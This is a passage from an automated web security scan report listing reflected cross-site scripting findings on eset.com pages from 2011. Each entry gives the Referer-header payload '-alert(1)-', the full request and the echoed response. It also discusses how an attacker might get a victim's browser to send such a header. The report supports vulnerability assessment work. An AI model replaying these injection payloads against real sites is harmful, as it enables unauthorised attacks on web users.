User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=e97d8"-alert(1)-"fbe9f8cd23c

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25660
Date: Sun, 17 Apr 2011 14:15:42 GMT
X-Varnish: 1858168788
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=e97d8"-alert(1)-"fbe9f8cd23c";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.267. http://www.eset.com/us/download [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d532"-alert(1)-"511703cb891 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/download HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=4d532"-alert(1)-"511703cb891

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 121242
Date: Sun, 17 Apr 2011 14:15:53 GMT
X-Varnish: 1858169596
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>B
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Download";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=4d532"-alert(1)-"511703cb891";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.268. http://www.eset.com/us/download/free-trial [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download/free-trial

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8efc"-alert(1)-"85ec92afe8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/download/free-trial HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=f8efc"-alert(1)-"85ec92afe8

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16364
Date: Sun, 17 Apr 2011 14:15:44 GMT
X-Varnish: 1858168989
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>B
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Download";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=f8efc"-alert(1)-"85ec92afe8";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.269. http://www.eset.com/us/download/free-trial/nod32-antivirus [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download/free-trial/nod32-antivirus

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by double quotation marks (the SiteCatalyst tracking variable s.prop12 in the response below). The payload 4915b"-alert(1)-"48ff9162e36 was submitted in the Referer HTTP header and was echoed unmodified in the application's response; the double quote in the payload terminates the string literal, so the text that follows it is parsed and executed as JavaScript.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data arrives in a request header, the flaw is not trivial to exploit against another user: an attacker cannot set a victim's Referer directly through a crafted link or form. Historically, client-side technologies such as Flash could be used to make a victim's browser issue a request carrying an arbitrary HTTP header, and any such technique would probably allow this flaw to be exploited. The Referer is also attacker-influenced without a plugin, because the browser populates it from the URL of the linking page: a victim who follows a link from an attacker-controlled page whose URL carries the payload may deliver it, depending on whether the browser percent-encodes the double quote in the outgoing Referer. These constraints partially mitigate the impact of the vulnerability.

Request

GET /us/download/free-trial/nod32-antivirus HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=4915b"-alert(1)-"48ff9162e36

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21464
Date: Sun, 17 Apr 2011 14:15:45 GMT
X-Varnish: 1858169070
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Download";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=4915b"-alert(1)-"48ff9162e36";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.270. http://www.eset.com/us/download/free-trial/smart-security [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download/free-trial/smart-security

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by double quotation marks (the SiteCatalyst tracking variable s.prop12 in the response below). The payload 99a9d"-alert(1)-"f4bb3c9f35 was submitted in the Referer HTTP header and was echoed unmodified in the application's response; the double quote in the payload terminates the string literal, so the text that follows it is parsed and executed as JavaScript.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data arrives in a request header, the flaw is not trivial to exploit against another user: an attacker cannot set a victim's Referer directly through a crafted link or form. Historically, client-side technologies such as Flash could be used to make a victim's browser issue a request carrying an arbitrary HTTP header, and any such technique would probably allow this flaw to be exploited. The Referer is also attacker-influenced without a plugin, because the browser populates it from the URL of the linking page: a victim who follows a link from an attacker-controlled page whose URL carries the payload may deliver it, depending on whether the browser percent-encodes the double quote in the outgoing Referer. These constraints partially mitigate the impact of the vulnerability.

Request

GET /us/download/free-trial/smart-security HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=99a9d"-alert(1)-"f4bb3c9f35

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21574
Date: Sun, 17 Apr 2011 14:15:47 GMT
X-Varnish: 1858169255
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Download";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=99a9d"-alert(1)-"f4bb3c9f35";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.271. http://www.eset.com/us/home [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by double quotation marks (the SiteCatalyst tracking variable s.prop12 in the response below). The payload 3de70"-alert(1)-"aff7b074c41 was submitted in the Referer HTTP header and was echoed unmodified in the application's response; the double quote in the payload terminates the string literal, so the text that follows it is parsed and executed as JavaScript.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data arrives in a request header, the flaw is not trivial to exploit against another user: an attacker cannot set a victim's Referer directly through a crafted link or form. Historically, client-side technologies such as Flash could be used to make a victim's browser issue a request carrying an arbitrary HTTP header, and any such technique would probably allow this flaw to be exploited. The Referer is also attacker-influenced without a plugin, because the browser populates it from the URL of the linking page: a victim who follows a link from an attacker-controlled page whose URL carries the payload may deliver it, depending on whether the browser percent-encodes the double quote in the outgoing Referer. These constraints partially mitigate the impact of the vulnerability.

Request

GET /us/home HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=3de70"-alert(1)-"aff7b074c41

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18192
Date: Sun, 17 Apr 2011 14:15:46 GMT
X-Varnish: 1858169194
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>I
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=3de70"-alert(1)-"aff7b074c41";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.272. http://www.eset.com/us/home/compare-eset-to-competition [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/compare-eset-to-competition

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by double quotation marks (the SiteCatalyst tracking variable s.prop12 in the response below). The payload 3eb46"-alert(1)-"bea4f5a8167 was submitted in the Referer HTTP header and was echoed unmodified in the application's response; the double quote in the payload terminates the string literal, so the text that follows it is parsed and executed as JavaScript.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data arrives in a request header, the flaw is not trivial to exploit against another user: an attacker cannot set a victim's Referer directly through a crafted link or form. Historically, client-side technologies such as Flash could be used to make a victim's browser issue a request carrying an arbitrary HTTP header, and any such technique would probably allow this flaw to be exploited. The Referer is also attacker-influenced without a plugin, because the browser populates it from the URL of the linking page: a victim who follows a link from an attacker-controlled page whose URL carries the payload may deliver it, depending on whether the browser percent-encodes the double quote in the outgoing Referer. These constraints partially mitigate the impact of the vulnerability.

Request

GET /us/home/compare-eset-to-competition HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=3eb46"-alert(1)-"bea4f5a8167

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 24659
Date: Sun, 17 Apr 2011 14:15:46 GMT
X-Varnish: 1858169234
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=3eb46"-alert(1)-"bea4f5a8167";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.273. http://www.eset.com/us/home/nod32-antivirus [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/nod32-antivirus

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by double quotation marks (the SiteCatalyst tracking variable s.prop12 in the response below). The payload 45768"-alert(1)-"5ab3639d88d was submitted in the Referer HTTP header and was echoed unmodified in the application's response; the double quote in the payload terminates the string literal, so the text that follows it is parsed and executed as JavaScript.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data arrives in a request header, the flaw is not trivial to exploit against another user: an attacker cannot set a victim's Referer directly through a crafted link or form. Historically, client-side technologies such as Flash could be used to make a victim's browser issue a request carrying an arbitrary HTTP header, and any such technique would probably allow this flaw to be exploited. The Referer is also attacker-influenced without a plugin, because the browser populates it from the URL of the linking page: a victim who follows a link from an attacker-controlled page whose URL carries the payload may deliver it, depending on whether the browser percent-encodes the double quote in the outgoing Referer. These constraints partially mitigate the impact of the vulnerability.

Request

GET /us/home/nod32-antivirus HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=45768"-alert(1)-"5ab3639d88d

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25489
Date: Sun, 17 Apr 2011 14:15:47 GMT
X-Varnish: 1858169293
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>N
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=45768"-alert(1)-"5ab3639d88d";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.274. http://www.eset.com/us/home/smart-security [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/smart-security

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by double quotation marks (the SiteCatalyst tracking variable s.prop12 in the response below). The payload fdaa1"-alert(1)-"a109434bb74 was submitted in the Referer HTTP header and was echoed unmodified in the application's response; the double quote in the payload terminates the string literal, so the text that follows it is parsed and executed as JavaScript.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data arrives in a request header, the flaw is not trivial to exploit against another user: an attacker cannot set a victim's Referer directly through a crafted link or form. Historically, client-side technologies such as Flash could be used to make a victim's browser issue a request carrying an arbitrary HTTP header, and any such technique would probably allow this flaw to be exploited. The Referer is also attacker-influenced without a plugin, because the browser populates it from the URL of the linking page: a victim who follows a link from an attacker-controlled page whose URL carries the payload may deliver it, depending on whether the browser percent-encodes the double quote in the outgoing Referer. These constraints partially mitigate the impact of the vulnerability.

Request

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=fdaa1"-alert(1)-"a109434bb74

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25578
Date: Sun, 17 Apr 2011 14:15:47 GMT
X-Varnish: 1858169311
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=fdaa1"-alert(1)-"a109434bb74";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.275. http://www.eset.com/us/online-scanner [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/online-scanner

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by double quotation marks (the SiteCatalyst tracking variable s.prop12 in the response below). The payload fa10d"-alert(1)-"394143401d1 was submitted in the Referer HTTP header and was echoed unmodified in the application's response; the double quote in the payload terminates the string literal, so the text that follows it is parsed and executed as JavaScript.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data arrives in a request header, the flaw is not trivial to exploit against another user: an attacker cannot set a victim's Referer directly through a crafted link or form. Historically, client-side technologies such as Flash could be used to make a victim's browser issue a request carrying an arbitrary HTTP header, and any such technique would probably allow this flaw to be exploited. The Referer is also attacker-influenced without a plugin, because the browser populates it from the URL of the linking page: a victim who follows a link from an attacker-controlled page whose URL carries the payload may deliver it, depending on whether the browser percent-encodes the double quote in the outgoing Referer. These constraints partially mitigate the impact of the vulnerability.

Request

GET /us/online-scanner HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=fa10d"-alert(1)-"394143401d1

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=5si1qqo03relg5cpdnrm3fe981; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 20733
Date: Sun, 17 Apr 2011 12:55:03 GMT
X-Varnish: 1857986391
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=fa10d"-alert(1)-"394143401d1";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.276. http://www.eset.com/us/online-scanner/run [Referer HTTP header]

Summary

Severity:   Low
